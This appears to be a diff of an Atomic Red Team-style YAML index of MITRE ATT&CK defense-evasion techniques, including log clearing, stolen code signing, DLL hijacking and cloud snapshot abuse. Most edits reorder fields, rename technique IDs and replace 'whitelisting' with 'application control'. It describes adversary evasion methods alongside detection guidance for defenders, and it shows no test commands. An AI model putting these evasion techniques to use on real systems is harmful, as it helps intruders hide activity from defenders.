- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Clearing the Windows event logs requires Administrator permissions
+ x_mitre_defense_bypassed:
+ - Anti Virus
+ - Host Intrusion Prevention Systems
+ - Log Analysis
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: 'Deleting Windows event logs (via native binaries (Citation:
Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear),
or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation:
Microsoft Clear-EventLog)) may also generate an alterable event (Event ID
1102: "The audit log was cleared").'
- x_mitre_permissions_required:
- - Administrator
- x_mitre_defense_bypassed:
- - Anti Virus
- - Host Intrusion Prevention Systems
- - Log Analysis
- x_mitre_system_requirements:
- - Clearing the Windows event logs requires Administrator permissions
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1551.001
+ x_mitre_data_sources:
+ - API monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
+ identifier: T1070.001
atomic_tests:
- name: Clear Logs
auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967
@@ -21361,6 +21805,19 @@ defense-evasion:
phase_name: initial-access
modified: '2020-03-23T21:59:36.729Z'
created: '2020-03-13T20:36:57.378Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
+ or malicious activity, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -21368,22 +21825,32 @@ defense-evasion:
- SaaS
- Azure AD
- Office 365
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1553.002:
technique:
+ created: '2020-02-05T16:27:37.784Z'
+ modified: '2020-02-10T19:51:01.601Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
+ description: "Adversaries may create, acquire, or steal code signing materials
+ to sign their malware or tools. Code signing provides a level of authenticity
+ on a binary from the developer and a guarantee that the binary has not been
+ tampered with. (Citation: Wikipedia Code Signing) The certificates used during
+ an operation may be created, acquired, or stolen by the adversary. (Citation:
+ Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
+ Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001),
+ this activity will result in a valid signature.\n\nCode signing to verify
+ software on first run can be used on modern Windows and macOS/OS X systems.
+ It is not used on Linux due to the decentralized nature of the platform. (Citation:
+ Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass
+ security policies that require signed code to execute on a system. "
+ name: Code Signing
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1553.002
@@ -21400,29 +21867,6 @@ defense-evasion:
description: Shinotsuka, H. (2013, February 22). How Attackers Steal Private
Keys from Digital Certificates. Retrieved March 31, 2016.
source_name: Symantec Digital Certificates
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Code Signing
- description: "Adversaries may create, acquire, or steal code signing materials
- to sign their malware or tools. Code signing provides a level of authenticity
- on a binary from the developer and a guarantee that the binary has not been
- tampered with. (Citation: Wikipedia Code Signing) The certificates used during
- an operation may be created, acquired, or stolen by the adversary. (Citation:
- Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
- Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001),
- this activity will result in a valid signature.\n\nCode signing to verify
- software on first run can be used on modern Windows and macOS/OS X systems.
- It is not used on Linux due to the decentralized nature of the platform. (Citation:
- Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass
- security policies that require signed code to execute on a system. "
- id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-02-10T19:51:01.601Z'
- created: '2020-02-05T16:27:37.784Z'
x_mitre_platforms:
- macOS
- Windows
@@ -21438,6 +21882,21 @@ defense-evasion:
atomic_tests: []
T1027.004:
technique:
+ created: '2020-03-16T15:30:57.711Z'
+ modified: '2020-03-29T20:59:32.293Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ description: |-
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+
+ Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
+ name: Compile After Delivery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1027.004
@@ -21451,21 +21910,6 @@ defense-evasion:
url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
Info Stealer and Adware. Retrieved April 25, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Compile After Delivery
- description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
-
- Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T20:59:32.293Z'
- created: '2020-03-16T15:30:57.711Z'
x_mitre_platforms:
- Linux
- macOS
@@ -21564,7 +22008,7 @@ defense-evasion:
description: |-
Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
- A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
+ A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
name: Compiled HTML File
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -21597,27 +22041,27 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T21:04:50.295Z'
+ modified: '2020-06-20T22:32:24.589Z'
created: '2020-01-23T18:53:54.377Z'
- x_mitre_contributors:
- - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Application whitelisting
- x_mitre_permissions_required:
- - User
+ x_mitre_platforms:
+ - Windows
x_mitre_detection: |-
Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.
Monitor presence and use of CHM files, especially if they are not typically used within an environment.
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
identifier: T1218.001
atomic_tests:
- name: Compiled HTML Help Local Payload
@@ -21695,27 +22139,27 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-23T23:48:33.904Z'
created: '2019-12-19T20:21:21.669Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Ability to update component device firmware from the host operating system.
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
+ - File monitoring
+ x_mitre_detection: |-
+ Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
+
+ Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
x_mitre_data_sources:
- Component firmware
- Process monitoring
- Disk forensics
- API monitoring
- x_mitre_detection: |-
- Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
-
- Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_system_requirements:
- - Ability to update component device firmware from the host operating system.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1218.002:
technique:
@@ -21725,7 +22169,7 @@ defense-evasion:
For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
- Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.
+ Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
name: Control Panel
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -21754,17 +22198,17 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T16:11:43.517Z'
+ modified: '2020-06-20T22:33:18.929Z'
created: '2020-01-23T19:59:52.630Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Application whitelisting
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - Windows Registry
+ - DLL monitoring
+ - Binary file metadata
+ - API monitoring
x_mitre_detection: |-
Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)
@@ -21775,15 +22219,14 @@ defense-evasion:
* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)
Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - Windows Registry
- - DLL monitoring
- - Binary file metadata
- - API monitoring
- x_mitre_platforms:
- - Windows
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.002
atomic_tests:
- name: Control Panel Items
@@ -21810,6 +22253,60 @@ defense-evasion:
'
name: command_prompt
+ T1578.002:
+ technique:
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ description: |-
+ An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
+
+ Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.
+ name: Create Cloud Instance
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1578.002
+ url: https://attack.mitre.org/techniques/T1578/002
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
+ - source_name: AWS CloudTrail Search
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ - source_name: Azure Activity Logs
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ - source_name: Cloud Audit Logs
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-18T11:45:36.417Z'
+ created: '2020-05-14T14:45:15.978Z'
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
+ x_mitre_data_sources:
+ - GCP audit logs
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
+
+ In AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)
+ atomic_tests: []
T1134.002:
technique:
external_references:
@@ -21839,28 +22336,116 @@ defense-evasion:
phase_name: privilege-escalation
modified: '2020-03-26T21:28:19.476Z'
created: '2020-02-18T16:48:56.582Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Access tokens
- - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
x_mitre_detection: |-
If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Access tokens
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1578.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1578.001
+ url: https://attack.mitre.org/techniques/T1578/001
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
+ - source_name: AWS Cloud Trail Backup API
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ - source_name: Azure - Monitor Logs
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ - source_name: Cloud Audit Logs
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ - source_name: GCP - Creating and Starting a VM
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Create Snapshot
+ description: |-
+ An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1536) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
+
+ An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-19T14:45:59.618Z'
+ created: '2020-06-09T15:33:13.563Z'
x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
+
+ In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).
+
+ In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
+
+ Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot": parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM)
+ x_mitre_data_sources:
+ - GCP audit logs
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
atomic_tests: []
T1574.001:
technique:
+ created: '2020-03-13T18:11:08.357Z'
+ modified: '2020-03-26T16:13:58.862Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
+
+ There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
+
+ Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
+
+ If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
+ Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
+ name: DLL Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.001
@@ -21891,30 +22476,6 @@ defense-evasion:
url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html
description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking
Revisited. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: DLL Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
-
- There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
-
- Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
-
- If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
- Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
- id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T16:13:58.862Z'
- created: '2020-03-13T18:11:08.357Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -21991,23 +22552,23 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T16:23:21.010Z'
+ modified: '2020-06-20T22:05:42.513Z'
created: '2020-03-13T19:41:37.908Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Loaded DLLs
- - Process monitoring
- - Process use of network
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor processes for unusual activity (e.g., a process that
does not use the network begins to do so). Track DLL metadata, such as a hash,
and compare DLLs that are loaded at process execution time against previous
executions to detect differences that do not correlate with patching or updates.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Loaded DLLs
+ - Process monitoring
+ - Process use of network
+ x_mitre_platforms:
+ - Windows
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -22074,6 +22635,20 @@ defense-evasion:
phase_name: initial-access
modified: '2020-03-23T21:37:34.567Z'
created: '2020-03-13T20:15:31.974Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: Monitor whether default accounts have been activated or logged
+ into. These audits should also include checks on any appliances and applications
+ for default credentials or SSH keys, and if any are discovered, they should
+ be updated immediately.
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
x_mitre_platforms:
- Linux
- macOS
@@ -22084,20 +22659,60 @@ defense-evasion:
- Office 365
- Azure AD
- SaaS
+ atomic_tests: []
+ T1578.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1578.003
+ url: https://attack.mitre.org/techniques/T1578/003
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
